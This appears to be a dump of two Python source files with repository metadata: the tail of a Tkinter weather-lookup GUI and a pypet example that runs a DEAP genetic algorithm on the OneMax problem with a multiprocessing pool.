# store the value of "main" key in variable y
y = x["main"]
# store the value corresponding to the "temp" key of y
current_temperature = y["temp"]
# store the value corresponding to the "pressure" key of y
current_pressure = y["pressure"]
# store the value corresponding to the "humidity" key of y
current_humidiy = y["humidity"]
# store the value of "weather" key in variable z
z = x["weather"]
# store the value corresponding to the "description" key
# at the 0th index of z
weather_description = z[0]["description"]
# insert method inserting the
# value in the text entry box.
temp_field.insert(1, str(current_temperature) + " Farenheit")
atm_field.insert(10, str(current_pressure) + " hPa")
humid_field.insert(15, str(current_humidiy) + " %")
desc_field.insert(10, str(weather_description) )
# if city is not found
else :
# message dialog box appear which
# shows given Error meassgae
messagebox.showerror("Error", "City Not Found \n" "Please enter valid city name")
# clear the content of city_field entry box
city_field.delete(0, END)
# Function for clearing the
# contents of all text entry boxes
def clear_all() :
city_field.delete(0, END)
temp_field.delete(0, END)
atm_field.delete(0, END)
humid_field.delete(0, END)
desc_field.delete(0, END)
# set focus on the city_field entry box
city_field.focus_set()
# Driver code
if __name__ == "__main__" :
# Create a GUI window
root = Tk()
# set the name of tkinter GUI window
root.title("Weather Application")
# Set the background colour of GUI window
root.configure(background = "aqua")
# Set the configuration of GUI window
root.geometry("425x175")
# Create a Weather Gui Application label
headlabel = Label(root, text = "Weather Application", fg = 'black',bg='white')
# Create a City name : label
label1 = Label(root, text = "City name : ", fg = 'black',bg='aqua')
# Create a City name : label
label2 = Label(root, text = "Temperature :", fg = 'black',bg='aqua')
# Create a atm pressure : label
label3 = Label(root, text = "Atm pressure :", fg = 'black',bg='aqua')
# Create a humidity : label
label4 = Label(root, text = "Humidity :", fg = 'black',bg='aqua')
# Create a description :label
label5 = Label(root, text = "Description :", fg = 'black',bg='aqua')
# grid method is used for placing
# the widgets at respective positions
# in table like structure .
headlabel.grid(row = 0, column = 1)
label1.grid(row = 1, column = 0, sticky ="E")
label2.grid(row = 3, column = 0, sticky ="E")
label3.grid(row = 4, column = 0, sticky ="E")
label4.grid(row = 5, column = 0, sticky ="E")
label5.grid(row = 6, column = 0, sticky ="E")
# Create a text entry box
# for filling or typing the information.
city_field = Entry(root)
temp_field = Entry(root)
atm_field = Entry(root)
humid_field = Entry(root)
desc_field = Entry(root)
# grid method is used for placing
# the widgets at respective positions
# in table like structure .
# ipadx keyword argument set width of entry space .
city_field.grid(row = 1, column = 1, ipadx ="60")
temp_field.grid(row = 3, column = 1, ipadx ="100")
atm_field.grid(row = 4, column = 1, ipadx ="100")
humid_field.grid(row = 5, column = 1, ipadx ="100")
desc_field.grid(row = 6, column = 1, ipadx ="100")
# Create a Submit Button and attached
# to tell_weather function
button1 = Button(root, text = "Submit", fg = "black", command = tell_weather)
# Create a Clear Button and attached
# to clear_all function
button2 = Button(root, text = "Clear", fg = "black", command = clear_all)
# grid method is used for placing
# the widgets at respective positions
# in table like structure .
button1.grid(row = 2, column = 1)
button2.grid(row = 7, column = 1)
# Start the GUI
root.mainloop() | [
"76172276+Gagan-nmims@users.noreply.github.com"
] | 76172276+Gagan-nmims@users.noreply.github.com |
c53ec5397ec182007a22d88243b2d4ec32a3f966 | d6ca0b326f1bd0ce381c6db611f6331096bf4187 | /examples/example_20_using_deap_manual_runs.py | ab46bba8dfec0020018669d017e35953cbda71ea | [
"BSD-3-Clause"
] | permissive | SmokinCaterpillar/pypet | aa35355d70e8f44be015313494376d993f645d80 | 3d454ac65f89e7833baaf89510f73c546e90d8f6 | refs/heads/develop | 2023-08-08T16:01:54.087819 | 2023-02-14T14:59:32 | 2023-02-14T14:59:32 | 12,901,526 | 89 | 22 | BSD-3-Clause | 2023-07-24T00:46:12 | 2013-09-17T17:06:00 | Python | UTF-8 | Python | false | false | 6,723 | py | """ An example showing how to use DEAP optimization (http://pythonhosted.org/deap/).
DEAP can be combined with *pypet* to keep track of all the data and the full trajectory
of points created by a genetic algorithm.
Note that *pypet* adds quite some overhead to the optimization algorithm.
Using *pypet* in combination with DEAP is only suitable in case the
evaluation of an individual (i.e. a single run) takes a considerable amount of time
(i.e. 1 second or longer) and, thus, pypet's overhead is only marginal.
This *OneMax* problem serves only as an example and is not a well suited problem.
Suitable would be the genetic optimization of neural networks where running and evaluating
the network may take a few seconds.
Here we avoid using an Environment and *manually* execute runs using multiprocessing.
"""
__author__ = 'Robert Meyer'
import random
import os
import multiprocessing as multip
try:
from itertools import izip
except ImportError:
# For Python 3
izip = zip
from deap import base
from deap import creator
from deap import tools
from pypet import Trajectory, cartesian_product, manual_run, MultiprocContext
@manual_run(store_meta_data=True) # Important decorator for manual execution of runs
def eval_one_max(traj, individual):
"""The fitness function"""
traj.f_add_result('$set.$.individual', list(individual))
fitness = sum(individual)
traj.f_add_result('$set.$.fitness', fitness)
traj.f_store()
return (fitness,) # DEAP wants a tuple here!
def eval_wrapper(the_tuple):
"""Wrapper function that unpacks a single tuple as arguments to the fitness function.
The pool's map function only allows a single iterable so we need to zip it first
and then unpack it here.
"""
return eval_one_max(*the_tuple)
def main():
# No environment here ;-)
filename = os.path.join('experiments', 'example_20.hdf5')
traj = Trajectory('onemax', filename=filename, overwrite_file=True)
# ------- Add parameters ------- #
traj.f_add_parameter('popsize', 100)
traj.f_add_parameter('CXPB', 0.5)
traj.f_add_parameter('MUTPB', 0.2)
traj.f_add_parameter('NGEN', 20)
traj.f_add_parameter('generation', 0)
traj.f_add_parameter('ind_idx', 0)
traj.f_add_parameter('ind_len', 50)
traj.f_add_parameter('indpb', 0.005)
traj.f_add_parameter('tournsize', 3)
traj.f_add_parameter('seed', 42)
traj.f_store(only_init=True)
# ------- Create and register functions with DEAP ------- #
creator.create("FitnessMax", base.Fitness, weights=(1.0,))
creator.create("Individual", list, fitness=creator.FitnessMax)
toolbox = base.Toolbox()
# Attribute generator
toolbox.register("attr_bool", random.randint, 0, 1)
# Structure initializers
toolbox.register("individual", tools.initRepeat, creator.Individual,
toolbox.attr_bool, traj.ind_len)
toolbox.register("population", tools.initRepeat, list, toolbox.individual)
# Operator registering
toolbox.register("mate", tools.cxTwoPoint)
toolbox.register("mutate", tools.mutFlipBit, indpb=traj.indpb)
toolbox.register("select", tools.selTournament, tournsize=traj.tournsize)
toolbox.register("evaluate", eval_wrapper)
pool = multip.Pool(4)
toolbox.register("map", pool.map) # We use the pool's map function!
# ------- Initialize Population -------- #
random.seed(traj.seed)
pop = toolbox.population(n=traj.popsize)
CXPB, MUTPB, NGEN = traj.CXPB, traj.MUTPB, traj.NGEN
start_idx = 0 # We need to count executed runs
print("Start of evolution")
for g in range(traj.NGEN):
print("-- Generation %i --" % g)
# Determine individuals that need to be evaluated
eval_pop = [ind for ind in pop if not ind.fitness.valid]
# Add as many explored runs as individuals that need to be evaluated
traj.f_expand(cartesian_product({'generation': [g], 'ind_idx': range(len(eval_pop))}))
# We need to make the storage service multiprocessing safe
mc = MultiprocContext(traj, wrap_mode='QUEUE')
mc.f_start()
# Create a single iterable to be passed to our fitness function (wrapper).
# `yields='copy'` is important, the pool's `map` function will
# go over the whole iterator at once and store it in memory.
# So for every run we need a copy of the trajectory.
# Alternatively, you could use `yields='self'` and use the pool's `imap` function.
zip_iterable = izip(traj.f_iter_runs(start_idx, yields='copy'), eval_pop)
fitnesses = toolbox.map(eval_wrapper, zip_iterable)
# fitnesses is just a list of tuples [(fitness,), ...]
for idx, fitness in enumerate(fitnesses):
# Update fitnesses
eval_pop[idx].fitness.values = fitness
# Finalize the multiproc wrapper
mc.f_finalize()
# Update start index
start_idx += len(eval_pop)
print(" Evaluated %i individuals" % len(eval_pop))
# Gather all the fitnesses in one list and print the stats
fits = [ind.fitness.values[0] for ind in pop]
length = len(pop)
mean = sum(fits) / length
sum2 = sum(x*x for x in fits)
std = abs(sum2 / length - mean**2)**0.5
print(" Min %s" % min(fits))
print(" Max %s" % max(fits))
print(" Avg %s" % mean)
print(" Std %s" % std)
# ------- Create the next generation by crossover and mutation -------- #
if g < traj.NGEN -1: # not necessary for the last generation
# Select the next generation individuals
offspring = toolbox.select(pop, len(pop))
# Clone the selected individuals
offspring = list(map(toolbox.clone, offspring))
# Apply crossover and mutation on the offspring
for child1, child2 in zip(offspring[::2], offspring[1::2]):
if random.random() < CXPB:
toolbox.mate(child1, child2)
del child1.fitness.values
del child2.fitness.values
for mutant in offspring:
if random.random() < MUTPB:
toolbox.mutate(mutant)
del mutant.fitness.values
# The population is entirely replaced by the offspring
pop[:] = offspring
# Stop the multiprocessing pool
pool.close()
pool.join()
print("-- End of (successful) evolution --")
best_ind = tools.selBest(pop, 1)[0]
print("Best individual is %s, %s" % (best_ind, best_ind.fitness.values))
traj.f_store() # And store all the rest of the data
if __name__ == "__main__":
main() | [
"robert.meyer@ni.tu-berlin.de"
] | robert.meyer@ni.tu-berlin.de |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.